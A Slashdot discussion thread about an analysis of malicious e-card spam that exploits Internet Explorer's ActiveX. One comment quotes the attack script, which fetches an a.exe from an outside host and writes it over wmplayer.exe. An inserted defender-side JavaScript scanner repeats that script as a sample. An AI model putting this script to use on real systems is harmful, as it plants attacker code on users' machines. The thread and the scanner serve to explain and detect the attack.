Slashdot Mirror


Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to overwriting wmplayer.exe, this particular piece of spam is a rather nasty one."

34 of 482 comments

  1. Re:e-cards by jwthompson2 · · Score: 4, Interesting

    Interesting take. I know my wife likes ecards because it is of course free which beats a card and stamp. She doesn't use them very often, except when she comes across a particularly funny or expressive one, and only when we forget to get a real card... :-)

    ---
    Mod me down...I'm already -1....woot!

    --
    Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
  2. Spam in Outlook by DoorFrame · · Score: 4, Interesting

    I was having a discussion with a friend the other day about Outlook email virii, and I quite frankly wasn't sure anymore. If a Windows box is completely updated, is it possible for an email to be able to unload/execute a virus without a user opening an attachment or clicking on an off-email link? Any examples?

  3. The most frightening bit here by Rope_a_Dope · · Score: 5, Interesting

    ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an ActiveX control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

    1. Re:The most frightening bit here by CdBee · · Score: 5, Interesting

      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      (MSN) Chatrooms and Windows Update spring to mind as web-based uses of ActiveX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActiveX chatrooms though; I've seen chatroom moderators recommending users to download Mozilla :-)

      One extra worrying thing though: when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActiveX control for the chatroom you have to install Microsoft ActiveX Wrapper for Netscape.

      Potentially, Mozilla users are now affected by ActiveX insecurities if they accept this download.

      --
      I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
    2. Re:The most frightening bit here by lordDallan · · Score: 5, Interesting

      The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

      Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

      If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

    3. Re:The most frightening bit here by kisrael · · Score: 4, Interesting

      "No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

      No it wouldn't be redundant; different behaviors are implied, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision".

      I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)

      W copies fine.
      X brings up that dialog:
      "Yes"--copy X, copy Y, ask about Z
      "Yes to all"--copy X, copy Y, copy Z
      "No"--skip X, copy Y, ask about Z
      "No to all"--skip X, copy Y, skip Z
      "Cancel"--skip X, skip Y, skip Z

      Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the asymmetry in the dialog is annoying.

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    4. Re:The most frightening bit here by misleb · · Score: 2, Interesting
      Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read (and when cleaning, write to) every file on the system, so they need ActiveX too.

      Maybe it is time the world gave up on these mega-web-applications. Why can't Microsoft write a damn standalone Windows Update application that doesn't use a browser.... like Apple does on OS X? Why does everything need to be web based these days? Sandbox the damn ActiveX crap, restrict user privileges by default, tighten Explorer security settings BY DEFAULT, and ship a standalone app for everything that you can. If Microsoft wants to improve security, they are ultimately going to have to stand up to users and say, "You know what? We will only trade so much security for convenience. Deal with it."

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
  4. Re:e-cards by toasted_calamari · · Score: 5, Interesting

    What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

    With regards to the article, that's definitely one of the nastiest browser exploits I've seen in a long time; makes me glad I don't use Windows and IE.

  5. Re:You might remember me by ggvaidya · · Score: 5, Interesting
    ... "This time, I'm here to screw up your computer and install a virus! How about that? Let's get started ..."

    Why do the poor virus writers go through all this trouble anyways? Don't they know they can get 60% of the machines out there with just an e-mail with an attachment?

    Then again, nowadays a lot of attention is being focused on trojan horses. What about real viruses - something not even hackers can figure out easily? It can't be too hard to write a trojan horse which pretends to be a cool little game for a month or so - before deleting all your files. Can it?

  6. A little bit unfair to Outlook by DoorFrame · · Score: 4, Interesting

    This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual issue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.

  7. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 5, Interesting

    That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

  8. I saw a similar type email by krray · · Score: 1, Interesting

    I saw a similar type email -- and after reading the article downloaded the a.exe file for review:
    $ file a.exe
    a.exe: MS-DOS executable (EXE), OS/2 or MS Windows

    Yep, appears to be an executable type file.

    Hey Microsoft -- this would be a HINT for inbound type files:
    $ chmod 700 a.exe

    Ready to execute -- what the heck. This is a sandboxed VMWAre type machine:
    $ ./a.exe
    sh: ./a.exe: cannot execute binary file

    Dag nabbit, what am I doing wrong? :)

  9. Redundant, I know. Don't run as Administrator. by gfecyk · · Score: 3, Interesting

    I've said this before and I'll say it again. Run a current version of Windows and run your programs as a regular user, not as a "power user" or as "administrator."

    Then the evil e-cards can't overwrite wmplayer.exe or anythingelse.exe because regular users don't have write access to the Windows directory or the Program Files directory, where they're stored.

    The same thing can happen to an idiot running Mozilla under Linux as root, or running Opera under BSD as root. Everyone here keeps missing the underlying problem because of their anti-M$ bias. Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:Redundant, I know. Don't run as Administrator. by upside · · Score: 2, Interesting

      It's atrocious how Windows apps STILL don't get written for multiuser and low-privilege user environments.

      Take for example Adobe's Photoshop 7 and Pagemaker 7. These came out way after Win2K. You have to make their respective folders and registry entries world writable before they start working for normal users.

      I'm not sure about the latest CS versions, but I have my doubts.

      --
      I'm sorry if I haven't offended anyone
    2. Re:Redundant, I know. Don't run as Administrator. by seanvaandering · · Score: 2, Interesting

      Get a clue, folks. If you do stupid stuff as root you're going to break your machine no matter what OS it runs.

      Sometimes it's needed to be said, and I'll agree, as a Linux newbie in my own right, I knew enough to know that running as root on my machine was the stupidest thing I could do. Also in Mandrake 9.2 - if you DO try to log in as root, your desktop is completely RED - a very annoying, but effective color.

      I think the biggest problem is that people think that because they OWN their computer that they should immediately have full access to EVERYTHING, including the fact that I have the right to run as administrator. Now I'm not debating that you can't run as admin, I'm stating that if someone made you a pilot today and gave ya a nice DC-10 on the runway, just because someone gave you something you have no clue how to use, would you just go and run with it? The unfortunate part is that computers look and act so "easy-to-use" - that while happy user is happily clicking away on "remove spam from your e-mail - click here" windows, the damage is already being done - and they don't even know it. Now here's the catch: when you TELL them that you should run as a regular user, they look at you like you came from another planet and say "yeah right - it's my computer and I'll damn well do what I please with it!" - which is great until they start calling you up for tech support because "It runs slow", or "It doesn't work" or [fill in your worst nightmare here].

      Cheers.

  10. Re:Are there really better alternatives??? by aborchers · · Score: 3, Interesting

    The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

    So, in effect, yes, there is an aspect to the other clients that is inherently more secure, but users savvy enough to obtain and use them could probably also configure and use most modern MS products fairly securely as well. It is a combination of user behavior and software design security.

    For the record, I find it hard to believe that someone with a 5-digit /. ID could ask this question and not be trolling... ;-)

    --
    Trouble making decisions? Just flip for it.
  11. German dialer spam gangs used "e-cards", too. by DocSnyder · · Score: 4, Interesting

    About a year ago, German email users were spammed with similar e-cards, which claimed to need a special presentation plugin. The "plugin" actually dialed an expensive premium-rate service number. Despite thousands of victims complaining about high phone bills, it took about a year to stop this kind of fraud.

  12. Using Mozilla on Windows won't protect you ... by Anonymous Coward · · Score: 5, Interesting
    wscript.exe can apparently be launched through Mozilla. Wscript.exe scripts can execute almost anything.

    I had FILEMON running (it monitors all disk i/o) and I navigated Mozilla to http://search.microsoft.com/ and entered a query in the second search textbox. Wscript.exe was fired up and it showed in FILEMON.

    My solution: I renamed wscript.exe and cscript.exe so they can't execute.

  13. I got one yesterday by swb · · Score: 3, Interesting

    Was the e-card itself (as viewed at the web site 123greetings.com) a problem, or was it the message itself the problem?

    I get those stupid e-cards from relatives occasionally, and I never open the messages in anything but pine because they're usually loaded with crap I don't want to run.

    In this case, I viewed the email in pine, copied the ecard number and viewed the stupid thing on the web site, presuming it would be from my brother (an AOL lifer), since it was my anniversary. It was unattributed on the site, so I figured it was just a spam/traffic generator.

  14. "Sparky" does this on clients' Enterprises. by gfecyk · · Score: 2, Interesting

    > Tell you what sparky -- YOU try that across
    > a enterprise type installation.

    Done. Twice.

    I'm an IT consultant, a professional. I practice what I preach and I test things. I bounce applications that don't work with MY security standards. And I'm paid well for it.

    I've massaged very broken applications into a secured environment. I'm talking about really broken, designed-for-16-bit-windows applications. I've never worked with recent versions of AutoCAD but, after at least ten years of developing for 32-bit Windows, and with Win2K being four years old, Autodesk has no excuse.

    --
    Use Evolution instead of Outlook? Bewa
  15. Re:Turn off HTML viewing in your email client! by Erik+Piper · · Score: 4, Interesting

    There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

    Erik

  16. Virus vs. Spam by the+grace+of+R'hllor · · Score: 5, Interesting

    Because Viruses can do better with some effort.

    MSBlaster is still going around. My own average from installing a base WinXP (and forgetting the Blaster fix and other updates) is about two minutes to being infected with the Blaster worm. A friend's personal best was when he was plugging his laptop into the university's network for a bit. After sixteen (16) seconds, his machine had blaster installed and got the RPC to reboot!

    E-mail just can't beat those times.

  17. Re:Ugly is what ugly does by JCMay · · Score: 5, Interesting

    What's sad is that Mozilla Firebird^H^H^H^Hfox now automatically launches certain files, just like IE. Clicking on a .doc, .xls, or .ppt file will automatically open an MS Office application. With all the problems with VB viruses it's unfortunate that Firefox makes this the default.


    There's a fundamental difference between starting an external viewer to view a downloaded file, and just executing the downloaded file. It's not the browser's fault that the external viewers have scripting languages that cause security issues, is it?

    There's nothing wrong with viewing something in Acrobat Reader. I appreciate that when I see articles in Word format that Firefox opens OpenOffice.org's swriter for me.

  18. the sky is falling! by Carty · · Score: 1, Interesting

    "which is a rather clear analysis of a piece of malicious spam"

    I appreciate his effort but I don't see what's particularly clear about:

    'I don't have a windows machine, and don't particularly want to run this and the other executable on one. If someone wants to investigate, feel free.'

    One thing that *is* clear is that Windows machines that have installed the most recent patches from MS are not vulnerable. Is it really necessary to abandon IE?

    I am no MS apologist but I did not learn anything meaningful from this ...

  19. Re:Are there really better alternatives??? by orthogonal · · Score: 5, Interesting
    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

    Fire{WHATEVER_WEEK_THIS_IS} doesn't, so far as I know, do this:
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", "http://adversting.co.uk/a.exe",0);
    x.Send();

    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

    No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

    Go to web-site, get a new OS!

    And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop to think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag)?

    To the contrary, they considered it a positive feature! Why? Because Visual Basic "programmers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

    Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

    I mean, Christ. This is just a travesty, and an open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, but I never knew javascript could be so bad.

    I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

    Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidentally assigned by Windows to my CD-ROM drive.

    I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

    What the hell?
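    As an added example (not code from the thread or from the article it discusses), here is a defender-side heuristic that scans an HTML mail body for exactly the chain orthogonal quotes: an XMLHTTP fetch, an ADODB.Stream buffer and a SaveToFile into a program directory, tucked into a hidden textarea. The sample message, the example.invalid host and the function names are constructed for this demonstration.

```javascript
// Added example: heuristic scanner for the ActiveX fetch-and-overwrite
// chain quoted in the thread. Not from the thread or the analysed article;
// the sample input, the URL and all names are constructed for this demo.

// ProgIDs that hand page script network, disk or process access.
const RISKY_PROGIDS = {
  "microsoft.xmlhttp": "scriptable HTTP client: fetches arbitrary bytes",
  "msxml2.xmlhttp": "scriptable HTTP client: fetches arbitrary bytes",
  "adodb.stream": "binary stream: writes fetched bytes to disk",
  "scripting.filesystemobject": "file system access: creates/overwrites files",
  "wscript.shell": "shell access: launches programs",
};

// Directories web content must never be allowed to write into.
const PROTECTED_PATH_RE = /program files|\\windows\b|winnt|system32/i;

const ACTIVEX_RE = /new\s+ActiveXObject\s*\(\s*["']([^"']+)["']\s*\)/gi;
const SAVETOFILE_RE = /\.SaveToFile\s*\(\s*["']([^"']+)["']/gi;
const HIDDEN_TEXTAREA_RE =
  /<textarea\b[^>]*style\s*=\s*["'][^"']*(display\s*:\s*none|visibility\s*:\s*hidden)/gi;

function scanHtml(html) {
  const findings = [];
  let m;

  // 1. Every ActiveX control the markup tries to instantiate.
  ACTIVEX_RE.lastIndex = 0;
  while ((m = ACTIVEX_RE.exec(html)) !== null) {
    const note = RISKY_PROGIDS[m[1].toLowerCase()] || "unrecognised control";
    findings.push({ kind: "activex", progId: m[1], note });
  }

  // 2. Attempts to persist a stream to disk, with the destination checked
  //    against system and program directories.
  SAVETOFILE_RE.lastIndex = 0;
  while ((m = SAVETOFILE_RE.exec(html)) !== null) {
    findings.push({ kind: "savetofile", path: m[1], protectedPath: PROTECTED_PATH_RE.test(m[1]) });
  }

  // 3. Script stashed in an invisible textarea (the trick the comment
  //    complains about) is a finding in its own right.
  const hiddenTextareas = (html.match(HIDDEN_TEXTAREA_RE) || []).length;
  if (hiddenTextareas > 0) findings.push({ kind: "hidden-textarea", count: hiddenTextareas });

  // 4. The full chain: fetch with XMLHTTP, buffer in ADODB.Stream, write to
  //    disk. Any piece alone is only "review"; all three together is "block".
  const has = (re) => findings.some((f) => f.kind === "activex" && re.test(f.progId));
  const dropAndWrite =
    has(/xmlhttp/i) && has(/adodb\.stream/i) && findings.some((f) => f.kind === "savetofile");

  const verdict = dropAndWrite ? "block" : findings.length > 0 ? "review" : "allow";
  return { findings, hiddenTextareas, dropAndWrite, verdict };
}

// Constructed sample modelled on the script quoted in the thread; the host is
// a reserved .invalid name, not a real site.
const SAMPLE_HTML = String.raw`<html><body>
<p>You have received a greeting card!</p>
<textarea style="display:none">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://example.invalid/a.exe", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3; s.Type = 1; s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe", 2);
</textarea>
</body></html>`;

// A harmless card for comparison (also constructed).
const BENIGN_HTML = `<html><body><p>Happy anniversary!</p><img src="card.png"></body></html>`;

console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2)); // verdict: "block"
console.log(scanHtml(BENIGN_HTML).verdict); // "allow"
```

    The regexes are deliberately tolerant of whitespace and quote style; a real filter would also decode HTML entities and script-encoded payloads before matching.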
  20. OR by diablobynight · · Score: 4, Interesting

    You could just simply not view messages from people you don't know. This would solve the majority of problems. I mean if I don't know you, I don't read mail from you. I mean there are times when I take the chance, but let's face it, how often do random people email your personal account? And if you're talking a webmaster or sales account, then yes, turn off HTML, or have your IT guy set up your securities properly.

    --
    Anonymous Cowards - Oh God, How I hate you
    1. Re:OR by diablobynight · · Score: 2, Interesting

      did you not read, I sometimes do read unknown email, meaning, I personally filter it, I don't use a refuse-all-unknown white list. And if I saw the subject said "In response to Slashdot", or something else that I was aware I was posting to, or investigating, then I read it with HTML turned off, but if it's from my buddies I read it with HTML on; if it's from my mom or any girl for that matter, I turn HTML off. lol know your email sender, and adjust accordingly.

      --
      Anonymous Cowards - Oh God, How I hate you
  21. Re:Don't run ActiveX as Administrator, simple. by the_L0rax · · Score: 2, Interesting

    They're right, even if you know better than to have your regular account be an admin account MS pretty much forces you to operate that way. I have tried setting up separate accounts and it just isn't practical. Way too many things require you to have admin privileges, so you can either switch users every 3rd program or you just give up and use an admin account. Even right clicking and choosing "Run As" rarely works right. Microsoft made a half-a**ed attempt at multi-user support just so they could say they had it.

  22. Monitoring...reputable...contradiction by Pac · · Score: 2, Interesting

    The phrase "a reputable Russian monitoring site" only makes sense if you think monitoring is a reputable business. I don't consider doubleclick reputable. I don't think anything in, near or around the advertising industry can be reputable. But that's just me, move on, nothing to see here.

  23. Spy.htm: honey pot potential by Ktistec+Machine · · Score: 4, Interesting

    Here's a honeypot idea: use the "spy.htm" code to add a machine to the attacker's "spy" log, then wait....

  24. Re:Turn off HTML viewing in your email client! by misleb · · Score: 2, Interesting
    I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

    This isn't a realistic option for most people. Nor is it very convenient. Unless, of course, the image is part of an existing website.

    Why shuttle around bloated email attachments?

    It is not a big deal in most cases. Although this brings up an interesting point. There are cases when people want to send files (maybe an MP3 or movie) in excess of 5 megabytes. This is not appropriate for the current state of email (SMTP, et al). What do regular users do when then want to send someone a large file? They're not going to choke MY SMTP servers (with virus scanning) with their huge attachments.

    -matthew

    --
    "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
  25. Re:Security through obscurity DOES work by Sgt+York · · Score: 3, Interesting
    Well, security through obscurity works, but only when the obscurity is at or very near 100%. In the Pentagon, no one is allowed to see the layout, and only certain people are allowed to interact with any part of it. The McVeigh execution was the same way, no one got to see any details of it. IIRC, the exact time/date wasn't even announced until the last minute.

    However, in software you can't have that near 100% obscurity because large numbers of people have to use the software. Take the Pentagon example. If it was necessary for a very large number of people to have somewhat limited access to the building on a continual basis, the security would eventually break down. The floor plan would eventually be at least partially elucidated and this could allow further security breaches, leading to the discovery of more of the floor plan, etc.

    The whole point of making software (like this) is so that lots of people will use it routinely. This high volume, routine use does eventually lead to a breach in the security of the software.

    I agree that the flat, absolute statement "security through obscurity never works" is incorrect. However, that pure obscurity is exceptionally rare, almost to the point of nonexistence in the software world.

    --

    There is a reason for everything. Sometimes that reason just sucks.

  26. Re:Turn off HTML viewing in your email client! by Endive4Ever · · Score: 2, Interesting

    When they first put in Windows for Workgroups at the company I worked for at the time, they put one of the more annoying putzes in Engineering in charge of 'the mail server' which was a wobbly install of NT Advanced Server 3.1.

    I proceeded to mail my entire c:\dos directory as attachments to one of my buddies. It just seemed like the thing to do. Boy, that took down the mail server bad.

    It really got the tech mad, but he was a third stringer doing make-work for the 'vanguard' engineer who thought it was such a good idea to roll out Windows For Workgroups (in direct conflict with the IT people who had other plans of afflicting us with Novell stuff,) and I was writing the embedded code that made the company's products run. It was overall a fun time.

    --
    ---
  27. Are Unix systems secure? by cpghost · · Score: 2, Interesting

    As Unix(*) users, we feel pretty confident when confronted with this kind of a.exe crap. But seriously, what would have happened, if the file was a Linux executable? A shell or perl script? Are we still secure? Maybe, maybe not:

    • It depends what browser we're using. Browsers on Unix normally don't execute remote code, but the more browsers we use, the less we can be sure.
    • Are our rendering engines (Gecko and Konqueror) really immune to buffer overruns of malicious web sites? We don't know for sure. Most of us are aware of Konqueror dumping core, but no harm is done, because a Windows virus couldn't start. What if the remote site contained valid Linux instructions instead?
    • A whole class of vulnerabilities consists of so called cross site scripting vulns (see bugtraq).
    • Even if an executable runs with the permissions of a regular, non-root user, are we still secure? I've seen setups where the user was member of group 0 (wheel), which opened up a whole lot of potential vulnerabilities.

    The biggest asset of the Unix community is still the high level computer literacy amongst its users. We're smarter than regular Windows users on the average, and we know better than to blindly click on links when we're being told to. But with growing Linux popularity, we're bound to "inherit" more unsavvy and clueless computer users, which would be just as malleable as Windows users.

    The last line of defense(tm) consists of just two principles:

    • We don't run our browsers in kernel mode.
    • We don't use the root account for regular activities (right?).

    Will that be enough, once spammers start targeting Linux? Let's hope for the best.

    (*) Unix in the generic sense, not Darl's.

    --
    cpghost at Cordula's Web.